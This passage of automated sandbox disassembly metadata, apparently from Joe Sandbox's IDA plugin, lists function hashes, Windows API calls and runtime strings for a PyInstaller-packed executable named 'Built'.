                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: MASK:$default$nombstr$pkix$utf8only
                                                              • API String ID: 2248877218-3483942737
                                                              • Opcode ID: 56a8b705b4d859711014d430f94cbbc3222095bc84f144be5c70752352c183a7
                                                              • Instruction ID: 3ea729b9a7470146014a074a56508643a088b58d997eb451fd50facbb5a66cda
                                                              • Opcode Fuzzy Hash: 56a8b705b4d859711014d430f94cbbc3222095bc84f144be5c70752352c183a7
                                                              • Instruction Fuzzy Hash: 9C312322F185858BEB418B18E470BB93B94EB85750F844232EB6E436D9DF2DE491C700
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF62664351A,?,00000000,00007FF626643F23), ref: 00007FF626642AA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                              • API String ID: 2050909247-2900015858
                                                              • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                              • Instruction ID: 3707d47eab5bf1ef0d49f47ec56f42d6f9429d0dfec2962f956a368fa293a6aa
                                                              • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                              • Instruction Fuzzy Hash: DC21AE32A18B8292EA209B51BC917EA6394FB887C4F400132FE8D93759DF7DD2559B42
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID:
                                                              • API String ID: 995526605-0
                                                              • Opcode ID: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
                                                              • Instruction ID: 71a3e350bc318ab344050ccc4a8136ee90ffad9eb8f84e3045c560a7cf2206e8
                                                              • Opcode Fuzzy Hash: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
                                                              • Instruction Fuzzy Hash: BA215831A0C68395DF109B59B854169A7A0FFC57A0F100235D66D83AE4DEADD4549F43
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                              • Instruction ID: 49f71f9c23f1e9b9ed64852648cddfe5d10437cfa9a45b5b27e1caaa3223b5ad
                                                              • Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                              • Instruction Fuzzy Hash: 23214820E0C20786FE65A7619E6313D5142BF447A0F144634E93ECAAD7DE2FA400AF43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                              • Instruction ID: 0cabc9d54a84eb1bb6e8698cd9d8ef80d2bf1fa14d70118ab14268c824f39381
                                                              • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                              • Instruction Fuzzy Hash: B0116031B18A4286EB508B52FC54339A7A4FB88BE4F044234EA5DCB7A4DF7DD8549B42
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF626649216), ref: 00007FF626648592
                                                              • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF6266485E9
                                                                • Part of subcall function 00007FF626649400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6266445E4,00000000,00007FF626641985), ref: 00007FF626649439
                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF626648678
                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF6266486E4
                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF6266486F5
                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF62664870A
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                              • String ID:
                                                              • API String ID: 3462794448-0
                                                              • Opcode ID: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
                                                              • Instruction ID: e9fbdee87210709e9c98904fdfba6af056407c53d33398781a02956b683732ee
                                                              • Opcode Fuzzy Hash: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
                                                              • Instruction Fuzzy Hash: 90418322B196C281EE709F12A9606AA6394FB84BC4F440135DE4DD7B89DE7DE401DB03
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true
                                                              • Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007E103019
                                                              • String ID: "%w" $%Q%s$-
                                                              • API String ID: 2848303308-628927912
                                                              • Opcode ID: 77611a162c6771daeffabd537d4af054408343021cd54e9f8853c5e37f3fccce
                                                              • Instruction ID: 803941c2e680669e9a53d6ab4449dae570245a8f2e4c0f71028dc22c71535f68
                                                              • Opcode Fuzzy Hash: 77611a162c6771daeffabd537d4af054408343021cd54e9f8853c5e37f3fccce
                                                              • Instruction Fuzzy Hash: 4BE1E322B09A8286EB16CF55A460A7977A8FB55BC8F044135DE6E077EDEF3CE441C700
                                                              APIs
                                                                • Part of subcall function 00007FF626648760: GetCurrentProcess.KERNEL32 ref: 00007FF626648780
                                                                • Part of subcall function 00007FF626648760: OpenProcessToken.ADVAPI32 ref: 00007FF626648793
                                                                • Part of subcall function 00007FF626648760: GetTokenInformation.ADVAPI32 ref: 00007FF6266487B8
                                                                • Part of subcall function 00007FF626648760: GetLastError.KERNEL32 ref: 00007FF6266487C2
                                                                • Part of subcall function 00007FF626648760: GetTokenInformation.ADVAPI32 ref: 00007FF626648802
                                                                • Part of subcall function 00007FF626648760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62664881E
                                                                • Part of subcall function 00007FF626648760: CloseHandle.KERNEL32 ref: 00007FF626648836
                                                              • LocalFree.KERNEL32(?,00007FF626643C55), ref: 00007FF62664916C
                                                              • LocalFree.KERNEL32(?,00007FF626643C55), ref: 00007FF626649175
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                              • API String ID: 6828938-1529539262
                                                              • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                              • Instruction ID: 9aee3baf377f608468a8f842ebd0bd00518453cfd8b55bb820aefac7871e31fc
                                                              • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                              • Instruction Fuzzy Hash: AD214F31A0874282EE24AB11ED253EA6365FF84780F444135EA4DD3796DF7EE845EB43
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B347
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B37D
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3AA
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3BB
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3CC
                                                              • SetLastError.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3E7
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                              • Instruction ID: 8d4df20984a9d2da6d39dd54753969e431821b778c3e6885988722b320830fc1
                                                              • Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                              • Instruction Fuzzy Hash: 0C116D20A0C64386FE54A3219E6313D6242BF447B0F144335E82EDA7C7DE2EA801AF43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007E10301170
                                                              • String ID: ..\s\crypto\x509v3\v3_utl.c$E$FALSE$TRUE
                                                              • API String ID: 1180092802-1433594941
                                                              • Opcode ID: 16a9b9d49632f7cb94d3c9f1f1350a0e8ca290e2a8a4e567c459755ac0dea05e
                                                              • Instruction ID: ab3f36fc15d21da24727214aa5b1b9da15a40f2570de725f4fece8b81fe915d7
                                                              • Opcode Fuzzy Hash: 16a9b9d49632f7cb94d3c9f1f1350a0e8ca290e2a8a4e567c459755ac0dea05e
                                                              • Instruction Fuzzy Hash: FD51E122B0964386FB14EB529460BB923D8AF59798F894438ED2D57BDEDF3CE641C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2109405337.00007FFE101D1000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFE101D0000, based on PE: true
                                                              • Associated: 00000005.00000002.2109058392.00007FFE101D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                              • Associated: 00000005.00000002.2109405337.00007FFE101E5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                              • Associated: 00000005.00000002.2109475898.00007FFE101E6000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                              • Associated: 00000005.00000002.2109504920.00007FFE101E8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffe101d0000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: %d work, %d block, ratio %5.2f$ too repetitive; using fallback sorting algorithm$VUUU
                                                              • API String ID: 3568877910-2988393112
                                                              • Opcode ID: 573b4fc15ac0525f29dd54b65a3727a92d2a990478cec9f35e6a839bb8044665
                                                              • Instruction ID: c3815f1d473d3ea27f666353b734d70346a09d29c9911c274f225d513c2c005d
                                                              • Opcode Fuzzy Hash: 573b4fc15ac0525f29dd54b65a3727a92d2a990478cec9f35e6a839bb8044665
                                                              • Instruction Fuzzy Hash: 9541A332B08A4287F6109B2694491A977A4FB98B74F105277EB9E537B5DF3DE442C700
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2109405337.00007FFE101D1000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFE101D0000, based on PE: true
                                                              • Associated: 00000005.00000002.2109058392.00007FFE101D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                              • Associated: 00000005.00000002.2109405337.00007FFE101E5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                              • Associated: 00000005.00000002.2109475898.00007FFE101E6000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                              • Associated: 00000005.00000002.2109504920.00007FFE101E8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffe101d0000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: combined CRCs: stored = 0x%08x, computed = 0x%08x$ {0x%08x, 0x%08x}
                                                              • API String ID: 0-2474432645
                                                              • Opcode ID: ef6240e13e0423811a17c51a7da6417c4ca94b7d665d8194e23af3f34193d1f1
                                                              • Instruction ID: 5326e459dcc6787916ace588de2ef321cbb929d5cde27024a64e8df77fa2ba01
                                                              • Opcode Fuzzy Hash: ef6240e13e0423811a17c51a7da6417c4ca94b7d665d8194e23af3f34193d1f1
                                                              • Instruction Fuzzy Hash: D2414931B0CE42C6FB609F26948827872A4EB45B64F1496B7DB8E877B5DF2CE841C710
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF626641B6A), ref: 00007FF62664295E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                              • API String ID: 2050909247-2962405886
                                                              • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                              • Instruction ID: f28a71460cd9599f0d07796ee5e64200ca790fcaf93a4e55c426e5d07c38cad7
                                                              • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                              • Instruction Fuzzy Hash: A0313522B1868292EB20A761BC516FA6394BF887D4F400132FE8DC3749EF7DD556DB02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                              • String ID: Unhandled exception in script
                                                              • API String ID: 3081866767-2699770090
                                                              • Opcode ID: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
                                                              • Instruction ID: b87cae1656d9ddd69439b409bb070a0faf5aef8027568092723290d009f800f4
                                                              • Opcode Fuzzy Hash: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
                                                              • Instruction Fuzzy Hash: 26315C32A19A8289EF24DB61FC552F96360FF88784F440135EA4D8BB4ADF3DD104DB02
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF62664918F,?,00007FF626643C55), ref: 00007FF626642BA0
                                                              • MessageBoxW.USER32 ref: 00007FF626642C2A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentMessageProcess
                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                              • API String ID: 1672936522-3797743490
                                                              • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                              • Instruction ID: 6c43680de41562ca9894786e3b91a250a1d41bf50f619e9c00fe59142ee3e928
                                                              • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                              • Instruction Fuzzy Hash: B521D122708B4282EB20DB14F8847AA73A4FB887C4F400132EA8D9775ADF3DD215CB42
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF626641B99), ref: 00007FF626642760
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                              • API String ID: 2050909247-1591803126
                                                              • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                              • Instruction ID: 415d3ceed63b74284f471c72a154b0ce66c9e97bab927fe4a514e6e95b9d6968
                                                              • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                              • Instruction Fuzzy Hash: DD21AE72A18B8292EB20DB50BC917EA6394FB883C4F400132FE8C97759DF7DD6559B42
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                              • Instruction ID: 605d36a21f3f64420109a094b3a562c99078770a1591395129ff42fa4cd5ada7
                                                              • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                              • Instruction Fuzzy Hash: 26F0AF21B0860782FE108B20EC8533A6320FF84761F440235CA6E861E4DF2ED048EB03
                                                              APIs
                                                              Memory Dump Source
